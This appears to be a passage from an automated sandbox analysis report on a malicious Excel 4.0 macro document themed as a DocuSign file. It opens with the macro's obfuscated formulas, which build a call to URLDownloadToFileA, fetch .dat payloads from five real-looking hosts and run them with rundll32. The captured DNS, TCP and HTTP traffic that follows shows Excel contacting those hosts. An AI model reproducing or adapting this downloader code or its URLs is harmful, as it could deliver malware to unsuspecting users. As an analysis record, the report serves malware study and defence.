                        ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                        ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Feb 23, 2021 15:50:05.331130981 CET | 49165 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:05.488856077 CET | 80 | 49165 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:05.488946915 CET | 49165 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:05.491146088 CET | 49165 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:05.647500992 CET | 80 | 49165 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:05.969320059 CET | 80 | 49165 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:05.969367981 CET | 80 | 49165 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:05.969517946 CET | 49165 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:05.970381975 CET | 49165 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:06.060266972 CET | 49166 | 80 | 192.168.2.22 | 162.241.80.6
                        Feb 23, 2021 15:50:06.126840115 CET | 80 | 49165 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:06.220350981 CET | 80 | 49166 | 162.241.80.6 | 192.168.2.22
                        Feb 23, 2021 15:50:06.220453978 CET | 49166 | 80 | 192.168.2.22 | 162.241.80.6
                        Feb 23, 2021 15:50:06.221399069 CET | 49166 | 80 | 192.168.2.22 | 162.241.80.6
                        Feb 23, 2021 15:50:06.379880905 CET | 80 | 49166 | 162.241.80.6 | 192.168.2.22
                        Feb 23, 2021 15:50:07.055249929 CET | 80 | 49166 | 162.241.80.6 | 192.168.2.22
                        Feb 23, 2021 15:50:07.055619955 CET | 49166 | 80 | 192.168.2.22 | 162.241.80.6
                        Feb 23, 2021 15:50:07.372119904 CET | 49167 | 80 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:07.656344891 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:07.656495094 CET | 49167 | 80 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:07.657131910 CET | 49167 | 80 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:07.943605900 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:08.604717016 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:08.604767084 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:08.604985952 CET | 49167 | 80 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:08.617775917 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:08.904891014 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:08.905150890 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:08.917357922 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:09.202397108 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:09.204022884 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:09.204051971 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:09.204065084 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:09.204185009 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:09.204241991 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:09.216017008 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:09.502155066 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:09.502310038 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:11.235893011 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:11.561037064 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:12.055818081 CET | 80 | 49166 | 162.241.80.6 | 192.168.2.22
                        Feb 23, 2021 15:50:12.056047916 CET | 49166 | 80 | 192.168.2.22 | 162.241.80.6
                        Feb 23, 2021 15:50:13.477612972 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477648973 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477665901 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477695942 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477715015 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477731943 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477746010 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477761984 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477777958 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477797031 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477832079 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477833033 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.477838039 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477843046 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477847099 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477852106 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.477874994 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.488809109 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.488879919 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.494765043 CET | 49172 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:13.606369972 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.606532097 CET | 49167 | 80 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.655329943 CET | 80 | 49172 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:13.655441046 CET | 49172 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:13.655874968 CET | 49172 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:13.762976885 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763005972 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763037920 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763052940 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763068914 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763091087 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763099909 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763128042 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763133049 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763135910 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763139009 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763159990 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763161898 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763165951 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763186932 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763186932 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763196945 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763211966 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763226032 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763236046 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763247967 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763261080 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763268948 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763284922 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763300896 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763305902 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763322115 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763329029 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763339996 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763354063 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763365030 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763376951 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763387918 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763400078 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763415098 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763422966 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763436079 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763446093 CET | 443 | 49168 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:50:13.763459921 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.763483047 CET | 49168 | 443 | 192.168.2.22 | 138.36.237.100
                        Feb 23, 2021 15:50:13.816329956 CET | 80 | 49172 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:14.123610973 CET | 80 | 49172 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:14.123636961 CET | 80 | 49172 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:14.123801947 CET | 49172 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:14.124448061 CET | 49172 | 80 | 192.168.2.22 | 72.52.227.180
                        Feb 23, 2021 15:50:14.284929991 CET | 80 | 49172 | 72.52.227.180 | 192.168.2.22
                        Feb 23, 2021 15:50:14.309663057 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:50:14.461277008 CET | 80 | 49173 | 68.66.216.42 | 192.168.2.22
                        Feb 23, 2021 15:50:14.461366892 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:50:14.462505102 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:50:14.613990068 CET | 80 | 49173 | 68.66.216.42 | 192.168.2.22
                        Feb 23, 2021 15:50:14.927211046 CET | 80 | 49173 | 68.66.216.42 | 192.168.2.22
                        Feb 23, 2021 15:50:14.927350044 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:50:18.611938953 CET | 80 | 49173 | 68.66.216.42 | 192.168.2.22
                        Feb 23, 2021 15:50:18.612014055 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:50:42.055811882 CET | 80 | 49166 | 162.241.80.6 | 192.168.2.22
                        Feb 23, 2021 15:50:43.606271982 CET | 80 | 49167 | 138.36.237.100 | 192.168.2.22
                        Feb 23, 2021 15:52:05.062410116 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:52:05.467545033 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:52:06.278798103 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:52:07.885788918 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:52:11.099622965 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42
                        Feb 23, 2021 15:52:17.511773109 CET | 49173 | 80 | 192.168.2.22 | 68.66.216.42

                        UDP Packets

                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Feb 23, 2021 15:50:05.148121119 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:05.314361095 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:05.989708900 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:06.056046009 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:07.077124119 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:07.369729042 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:09.896291018 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:09.947890997 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:09.955142975 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:10.006742001 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:10.207190037 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:10.257096052 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:10.273158073 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:10.326050043 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:10.631937981 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:10.693800926 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:10.700963974 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:10.762469053 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
                        Feb 23, 2021 15:50:14.142929077 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8
                        Feb 23, 2021 15:50:14.307647943 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22

                        DNS Queries

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                        Feb 23, 2021 15:50:05.148121119 CET | 192.168.2.22 | 8.8.8.8 | 0xfda2 | Standard query (0) | rzminc.com | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:05.989708900 CET | 192.168.2.22 | 8.8.8.8 | 0x5115 | Standard query (0) | pathinanchilearthmovers.com | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:07.077124119 CET | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | jugueterialatorre.com.ar | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:09.896291018 CET | 192.168.2.22 | 8.8.8.8 | 0xed69 | Standard query (0) | crt.sectigo.com | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:09.955142975 CET | 192.168.2.22 | 8.8.8.8 | 0x73f5 | Standard query (0) | crt.sectigo.com | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:14.142929077 CET | 192.168.2.22 | 8.8.8.8 | 0x4b51 | Standard query (0) | biblicalisraeltours.com | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Feb 23, 2021 15:50:05.314361095 CET | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | rzminc.com | | 72.52.227.180 | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:06.056046009 CET | 8.8.8.8 | 192.168.2.22 | 0x5115 | No error (0) | pathinanchilearthmovers.com | | 162.241.80.6 | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:07.369729042 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | jugueterialatorre.com.ar | | 138.36.237.100 | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:09.947890997 CET | 8.8.8.8 | 192.168.2.22 | 0xed69 | No error (0) | crt.sectigo.com | | 91.199.212.52 | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:10.006742001 CET | 8.8.8.8 | 192.168.2.22 | 0x73f5 | No error (0) | crt.sectigo.com | | 91.199.212.52 | A (IP address) | IN (0x0001)
                        Feb 23, 2021 15:50:14.307647943 CET | 8.8.8.8 | 192.168.2.22 | 0x4b51 | No error (0) | biblicalisraeltours.com | | 68.66.216.42 | A (IP address) | IN (0x0001)

                        HTTP Request Dependency Graph

                        • rzminc.com
                        • pathinanchilearthmovers.com
                        • jugueterialatorre.com.ar
                        • biblicalisraeltours.com

                        HTTP Packets

                        Session ID: 0 | Source IP: 192.168.2.22 | Source Port: 49165 | Destination IP: 72.52.227.180 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 23, 2021 15:50:05.491146088 CET | 0 | OUT | GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: rzminc.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:05.969320059 CET | 1 | IN | HTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:05 GMT
                        Server: Apache/2.4.46 (CentOS)
                        X-Powered-By: PHP/7.3.27
                        Upgrade: h2
                        Connection: keep-alive, close
                        Cache-Control: private, must-revalidate
                        Expires: Tue, 23 Feb 2021 14:50:05 GMT
                        Content-Length: 0
                        Content-Type: text/html; charset=UTF-8


                        Session ID: 1 | Source IP: 192.168.2.22 | Source Port: 49166 | Destination IP: 162.241.80.6 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 23, 2021 15:50:06.221399069 CET | 2 | OUT | GET /eznwcdhx/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: pathinanchilearthmovers.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:07.055249929 CET | 2 | IN | HTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:06 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Cache-Control: max-age=300
                        Expires: Tue, 23 Feb 2021 14:55:06 GMT
                        Accept-Ranges: none
                        X-Endurance-Cache-Level: 2
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=75
                        Content-Type: text/html; charset=UTF-8


                        Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49167 | Destination IP: 138.36.237.100 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 23, 2021 15:50:07.657131910 CET | 3 | OUT | GET /xjzpfwc/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: jugueterialatorre.com.ar
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:08.604717016 CET | 4 | IN | HTTP/1.1 301 Moved Permanently
                        Date: Tue, 23 Feb 2021 14:50:07 GMT
                        Server: Apache
                        X-Powered-By: PHP/7.3.20
                        Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=6b585f561c89b34e8ff5fc9bc8212736; path=/; secure; HttpOnly
                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                        Last-Modified: Tue, 23 Feb 2021 14:50:08 GMT
                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Location: https://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=utf-8
                        Feb 23, 2021 15:50:08.604767084 CET | 4 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0 (zero-length final chunk; the 301 carried no body)


                        Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49172 | Destination IP: 72.52.227.180 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 23, 2021 15:50:13.655874968 CET | 92 | OUT | GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: rzminc.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:14.123610973 CET | 120 | IN | HTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:13 GMT
                        Server: Apache/2.4.46 (CentOS)
                        X-Powered-By: PHP/7.3.27
                        Upgrade: h2
                        Connection: keep-alive, close
                        Cache-Control: private, must-revalidate
                        Expires: Tue, 23 Feb 2021 14:50:13 GMT
                        Content-Length: 0
                        Content-Type: text/html; charset=UTF-8


                        Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49173 | Destination IP: 68.66.216.42 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 23, 2021 15:50:14.462505102 CET | 121 | OUT | GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: biblicalisraeltours.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:14.927211046 CET | 122 | IN | HTTP/1.1 200 OK
                        Connection: Keep-Alive
                        X-Powered-By: PHP/7.4.14
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Date: Tue, 23 Feb 2021 14:50:14 GMT
                        Server: LiteSpeed
                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Content-Security-Policy: upgrade-insecure-requests
                        X-XSS-Protection: 1; mode=block
                        Referrer-Policy: no-referrer-when-downgrade
